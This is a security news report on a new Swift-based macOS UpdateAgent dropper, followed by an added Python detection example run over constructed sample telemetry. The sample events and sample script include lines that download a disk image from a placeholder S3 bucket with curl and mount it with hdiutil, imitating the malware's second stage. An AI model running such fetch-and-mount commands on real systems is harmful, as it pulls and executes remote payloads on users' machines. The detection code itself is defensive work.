UpdateAgent Returns with New macOS Malware Dropper Written in Swift (Security News, May 2022)
A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities.
UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.
The newly discovered Swift-based dropper masquerades as Mach-O binaries named "PDFCreator" and "ActiveDirectory" that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.
"The primary difference is that it reaches out to a different URL from which it should load a bash script," the researchers noted.
These bash scripts, named "Activedirec.sh" or "Bash qolveevgclr.sh", include a URL pointing to Amazon S3 buckets from which a second-stage disk image file is downloaded to the compromised endpoint and run.
"The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible," the researchers said.
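The chain described above (a binary named "PDFCreator" or "ActiveDirectory" that spawns a shell to run a fetched script, which in turn pulls a disk image from an S3 bucket) lends itself to a simple behavioural check on endpoint telemetry. The following is an added example, not code from the article or from the researchers it quotes: it applies those indicators to constructed sample process-execution records and to a constructed sample script. The record format, the `curl -o` download form, the bucket name and the use of `hdiutil` to mount the image are assumptions made for the example; only the binary names, script names and the S3-hosted disk image come from the report.

```python
"""Behavioural indicators for the UpdateAgent dropper chain, run over
constructed sample telemetry. Names from the report: PDFCreator, ActiveDirectory,
Activedirec.sh, qolveevgclr.sh, and a .dmg fetched from Amazon S3. The event
format, sample records, and the hdiutil mount step are assumptions."""
import os
import re
from typing import Dict, List

DROPPER_NAMES = {"PDFCreator", "ActiveDirectory"}
SCRIPT_NAMES = {"Activedirec.sh", "qolveevgclr.sh"}
SHELLS = {"bash", "sh", "zsh"}
# An Amazon S3 URL whose path ends in .dmg (virtual-hosted or path-style bucket).
S3_DMG_RE = re.compile(r"https?://[^\s'\"]*s3[.-][^\s'\"]*amazonaws\.com/[^\s'\"]*\.dmg", re.I)
CURL_OUT_RE = re.compile(r"-o\s+(\S+\.dmg)")

# Constructed sample of process-execution events (not real data).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "/Users/demo/Downloads/PDFCreator", "image": "/bin/bash",
     "cmdline": "bash /tmp/Activedirec.sh"},
    {"parent": "/Applications/Safari.app/Contents/MacOS/Safari", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://example.com/index.html"},
    {"parent": "/bin/bash", "image": "/usr/bin/curl",
     "cmdline": "curl -s -o /tmp/stage2.dmg https://placeholder-bucket.s3.amazonaws.com/stage2.dmg"},
    {"parent": "/bin/bash", "image": "/usr/bin/hdiutil",
     "cmdline": "hdiutil attach /tmp/stage2.dmg"},
]

# Constructed sample of a fetched second-stage script (not the real script).
SAMPLE_SCRIPT = """#!/bin/bash
curl -s -o /tmp/stage2.dmg https://placeholder-bucket.s3.amazonaws.com/stage2.dmg
hdiutil attach /tmp/stage2.dmg
"""


def scan_events(events: List[Dict[str, str]]) -> List[str]:
    """Return one finding per matched indicator, correlating an S3 .dmg download
    with a later mount of the same file."""
    findings: List[str] = []
    downloaded = set()  # .dmg paths fetched from S3, for later hdiutil correlation
    for e in events:
        parent = os.path.basename(e["parent"])
        image = os.path.basename(e["image"])
        cmd = e["cmdline"]
        if parent in DROPPER_NAMES and image in SHELLS:
            findings.append(f"dropper-named binary {parent} spawned shell: {cmd}")
        if image in SHELLS:
            for tok in cmd.split():
                if os.path.basename(tok) in SCRIPT_NAMES:
                    findings.append(f"shell ran known second-stage script: {tok}")
                    break
        if S3_DMG_RE.search(cmd):
            findings.append(f"disk image fetched from S3: {cmd}")
            m = CURL_OUT_RE.search(cmd)
            if m:
                downloaded.add(m.group(1))
        if image == "hdiutil":
            for tok in cmd.split():
                if tok in downloaded:
                    findings.append(f"S3-fetched disk image mounted: {tok}")
    return findings


def script_indicators(script_text: str) -> Dict[str, bool]:
    """Inspect a fetched bash script for the traits the report attributes to
    the second stage: an S3 URL serving a .dmg and a mount of that image
    (mounting via hdiutil is an assumption of this example)."""
    return {
        "s3_dmg_url": bool(S3_DMG_RE.search(script_text)),
        "mounts_image": "hdiutil" in script_text,
    }


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print("FINDING:", f)
    print(script_indicators(SAMPLE_SCRIPT))
```

On real telemetry the first two rules alone would be noisy if matched in isolation (any file can be named PDFCreator); the value is in requiring the chain, which is why the download and mount steps are correlated by file path rather than scored independently.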
News URL: https://thehackernews.com/2022/05/updateagent-returns-with-new-macos.html
Related news
- macOS HM Surf vuln might already be under exploit by major malware family
- North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS
- North Korean hackers use new macOS malware against crypto firms
- North Korean Hackers Target macOS Using Flutter-Embedded Malware
- New RustyAttr Malware Targets macOS Through Extended Attribute Abuse